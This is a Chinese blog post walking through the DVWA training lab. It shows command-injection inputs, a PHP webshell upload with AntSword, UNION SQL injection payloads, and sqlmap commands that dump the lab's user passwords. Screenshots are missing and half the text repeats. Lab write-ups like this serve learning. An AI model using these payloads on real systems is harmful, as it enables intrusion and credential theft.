DVWA靶机

最新推荐文章于 2024-07-11 16:34:57 发布
最新推荐文章于 2024-07-11 16:34:57 发布
阅读量223 收藏
点赞数
文章标签: 大数据 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53616768/article/details/125694163
版权

Brute Force(暴力破解)

burp爆破账户和密码,采用集束炸弹

转存失败重新上传取消

2.Commad Execution(命令注入)

low级别

查看源码,没有进行过滤

转存失败重新上传取消

查看文件/127.0.0.1 & ls

转存失败重新上传取消

查看地址

转存失败重新上传取消

medium级别

medium级别将&进行了过滤

将&换成|

地址

转存失败重新上传取消

查看文件

转存失败重新上传取消

3.CSRF

LOW级别

抓CSRF包,带账户密码的,右击生成poc,

转存失败重新上传取消

生成网址后,点进去http://burpsuite/show/2/ynd1nokfwzmk3wal6brj2uqsb969obee后会修改账户密码

转存失败重新上传取消

4.File lnclusion

LOW级别

随便输入一个文件,跳出路径。文件在page后面

转存失败重新上传取消

输入一个存在的文件

转存失败重新上传取消

medium级别

过滤了小写

转存失败重新上传取消

转存失败重新上传取消

5.File Upload

LOW级别

将有一句话木马的php文件上传,并与意见连接

转存失败重新上传取消

Medium级别

修改文件后缀,在上传是用burp抓包,并将后缀名修改回来

转存失败重新上传取消

蚁剑连接成功

转存失败重新上传取消

6.SQL lnjection

账户用户名

转存失败重新上传取消

用户名和数据库名:1'union select database(),user()#

转存失败重新上传取消

数据库版本和操作系统:1' union select version(),@@version_compile_os#

转存失败重新上传取消

数据库表:1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#

转存失败重新上传取消

爆出dvwa库,users表中的账户、密码:1' union select user,password from users#

转存失败重新上传取消

Medium级别

数字型注入:不需要单引号

需要去burp中修改

转存失败重新上传取消

获取用户表名

转存失败重新上传取消

表字段

转存失败重新上传取消

password字段

转存失败重新上传取消

7.SQL lnjection(盲注)

输入1,将网址复制到sqlmap,同时抓包burp,将cookie复制到sqlmap

sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" (-u 对网址)

转存失败重新上传取消

加dbs,查出数据库

sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" --dbs

转存失败重新上传取消

-D'数据库' #报数据库 , --tables #数据库表

爆4个数据库表

sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" -D 'dvwa' --tables

转存失败重新上传取消

-T '表名' --columns #字段名

爆出8个字段

sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" -D 'dvwa' -T 'users' --columns

转存失败重新上传取消

-C '要爆的东西'

爆账户密码uid,共5个

sqlmap -u "http://172.25.1.41:9080/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=077fo89gn8cs9fdn2lohr6p5h1; security=low" -D 'dvwa' -T 'users' -C 'username,password,user_id' --dump

转存失败重新上传取消

Medium级别

先用burp抓包,将内容保存到文件(名:medium)

sqlmap -r medium

转存失败重新上传取消

数据库 sqlmap -r medium --dbs

转存失败重新上传取消

爆出24个表

转存失败重新上传取消

低级和中级都一样,就不往下做了

8.XSS reflected(反射型)

LOW

转存失败重新上传取消

Medium

转存失败重新上传取消

High

转存失败重新上传取消

Medium

Burp抓包,修改name出的代码,可以大写绕过

转存失败重新上传取消

转存失败重新上传取消

High

.Brute Force(暴力破解)

burp爆破账户和密码,采用集束炸弹

正在上传…重新上传取消

2.Commad Execution(命令注入)

low级别

查看源码,没有进行过滤

正在上传…重新上传取消

查看文件/127.0.0.1 & ls

正在上传…重新上传取消

查看地址

正在上传…重新上传取消

medium级别

medium级别将&进行了过滤

将&换成|

地址

正在上传…重新上传取消

查看文件

正在上传…重新上传取消

3.CSRF

LOW级别

抓CSRF包,带账户密码的,右击生成poc,

正在上传…重新上传取消

生成网址后,点进去http://burpsuite/show/2/ynd1nokfwzmk3wal6brj2uqsb969obee后会修改账户密码

正在上传…重新上传取消

4.File lnclusion

LOW级别

随便输入一个文件,跳出路径。文件在page后面

正在上传…重新上传取消

输入一个存在的文件

正在上传…重新上传取消

medium级别

过滤了小写

正在上传…重新上传取消

正在上传…重新上传取消

5.File Upload

LOW级别

将有一句话木马的php文件上传,并与意见连接

正在上传…重新上传取消

Medium级别

修改文件后缀,在上传是用burp抓包,并将后缀名修改回来

正在上传…重新上传取消

蚁剑连接成功

正在上传…重新上传取消

XIFIWU
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dvwa靶场之SQL注入(low等级)
Y_KolaFish_Y的博客
12-20 1154
dvwa靶场之SQL注入(low等级) 第一步(判断是否可以注入) 1’ and 1=1#(正常回显) 1’ and 1=2#(无回显) 1’ or 1=1#(该表下所有数据项回显) 以上几步骤基本判断有sql注入漏洞 'union select table_schema ,table_name from information_schema.tables where table_sche...
DVWA靶场
chenjyboke的博客
02-18 4164
XSS(跨站脚本攻击) DOM型 low 在url输入选择的语言,查看执行的内容 发现会发生改变,可以往后面写脚本,添加一个脚本运行 <script>alert('123')</script> <script> 标签用于定义客户端脚本,比如 JavaScript。 script 元素既可以包含脚本语句,也可以通过 src 属性指向外部脚本文件。 必需的 type 属性规定脚本的 MIME 类型。 js标签,alert是弹出一个窗口的意思,如al
DvwaDvwa连接phpMyAdmin,在线管理并查看Dvwa后台数据库
share something here
03-22 2338
DvwaDvwa连接phpMyAdmin,在线管理查看后台数据库登录小皮面板选中Dvwa所在的站点,点击确认安装成功后,点击管理登录查看Dvwa数据库信息 登录小皮面板 从小皮面板,进入软件管理,找到phpMyAdmin,点击安装 选中Dvwa所在的站点,点击确认 等待安装 安装成功后,点击管理 登录 进入到主界面 登录后台数据库使用的默认账号密码是root root 查看 Dvwa数据库信息 可以看到有两张表,一张是guestbook,存储的是存储型XSS部分下的留言内容。第二个users存
如何使用BrupSuit、中国蚁剑巧妙登陆DVWA查看文件
weixin_53488451的博客
01-08 651
首先在自己新建一个实训文件夹下放一张储存很小的照片,在创建一个shell.php的后门文件内容为:然后在url中清空后输入cmd,打开cmd.exe;输入copy motuo.jpg/b+shell.php mnv.jpg将图片和shell.php文件一起生成二进制的图片文本格式。然后用记事本格式打开发现一句话木马在最后,打开dvwa的网
DVWA】SQL Injection
xxxxxxx45678的博客
11-08 566
SQL注入学习
SQL注入攻击的原理、分类和防御方法
热门推荐
Andrew的博客
02-27 2万+
一.SQL注入攻击原理 恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。   二.SQL注入攻击分类 (1)注入点的不同分类 数字类型的注入 字符串类型的注入 (2)提交方式的不同分类 GET注入 POST注入 COOKIE注入 HTTP注入 (3)获取信息的方...
DVWA靶机搭建
weixin_53567369的博客
01-11 270
DVWA靶机搭建 准备两台设备:Windows2008、Windows7 1、将DVWA压缩文件复制到Windows2008 D盘下,并解压 2、将解压后的文件夹DVWA剪切粘贴到*C:/xampp/htdocs/*下 用Windows7浏览器打开 3、编辑文件php.ini,用vim编辑器编辑,结果:PHP函数allow_url _include:Enabled 4、在Windows2008上打开127.0.0.1,点击进入phpMyAdmin 点击账户 5、最后一行root,点击修改权限,修
k8s环境部署dvwa靶机
09-01
k8s环境部署dvwa靶机
搭建DVWA靶机所需全部资源.rar
10-13
这个名为“搭建DVWA靶机所需全部资源.rar”的压缩包文件,显然是为帮助用户快速、方便地建立自己的DVWA学习环境而准备的。 首先,我们需要了解DVWA的基本概念。DVWA是一个具有各种常见安全漏洞的Web应用,如SQL注入...
DVWA Web渗透靶机
07-31
**DVWA(Damn Vulnerable Web Application)**是一个广泛使用的开源Web应用程序,专为网络安全专业人员、学生和教师设计,提供了一个安全的学习环境,用于实践Web应用程序渗透测试的技术和方法。这个应用包含了各种...
靶机-dvwa修改配置版
05-09
靶机-dvwa修改配置版是一个用于网络安全教育和练习的平台,主要针对Web应用程序的安全漏洞。DVWA(Damn Vulnerable Web Application)是一个开源的Web应用,设计用来帮助安全专业人员测试他们的技能,以及让开发者更...
DVWA、MCIR、pikachu、Mutillidae、BWAPP靶机安装包
03-24
在网络安全领域,靶机是一种专门设计用于安全测试和学习的计算机系统或网络环境。这个压缩包文件包含了多个知名的Web安全靶场平台,如DVWA(Damn Vulnerable Web Application)、MCIR(Modular Cybersecurity ...
DVWA-------简单的SQL注入
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入点
Dvwa之SQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1028
​ SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwa的sql注入的相关笔记。仅供学习。 ​
DVWA】SQL Injection-----------------------low
qq_43665434的博客
02-25 317
DVWA】SQL Injection-----------------------low 1、初步测试 输入单引号报错 输入' and 1=1#回显正常,说明存在sql注入 输入' or 1=1#,遍历出数据库内容: 用order by测出主查询为两个字段 2、获取数据库名、用户名、版本 用union语句查询数据库名和用户名: payload_1:' union select database(),user()# payload_2:' union select 1,concat_ws('~',dat
DVWA平台搭建安装
m0_64037702的博客
05-10 759
DVWA平台搭建安装PhpStudy下载安装DVWA下载安装 DVWA是由PHP和MySQL开发的,首先需要在系统中搭建一个支持PHP的web服务器。这里推荐使用PhpStudy PhpStudy下载安装 百度网盘下载解压:phpstudy链接链接:https://pan.baidu.com/s/1cq1Rtz608p8bbE8FMaYvLw 提取码:ytsi dvwa链接链接:https://pan.baidu.com/s/1MjMDFXxDUl3X-fD_JH9ASg 提取码:91ur 解压下载文件至当
DVWA—Brutefoce(暴力破解)
Cwillchris的博客
10-28 1318
DVWA靶机:172.16.12.10 windows攻击机:172.16.12.7 实验步骤: 一、Low级 1、查看源码及分析 先调整DVWA安全级别为Low,点击提交 点击左侧暴力破解,进入主题 查看源代码(在页面底部) 源码分析 <?php //检查变量是否设置(先看有没有Login参数) if( isset( $_GET[ 'Login' ] ) ) { //获取密码,存入pass变量中 $user = $_GET[ 'username' ].
SQL学习之路--DVWA等级LOW
m0_69555575的博客
06-17 512
一名想进入安全行业的普通青年
rabbitmq集群创建admin用户之后,提示can access virtual hosts是No access状态
最新发布
jiang0615csdn的博客
07-11 228
rabbitmq集群创建admin用户之后,提示can access virtual hosts是No access状态
dvwa靶机sql注入
08-04
DVWA靶机中的SQL注入是一种安全漏洞,攻击者可以通过构造恶意的SQL语句来绕过应用程序的验证和过滤机制,从而获取未授权的访问权限或者获取敏感信息。根据引用[1]和引用[2]中提到的内容,DVWA靶机中的SQL注入分为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值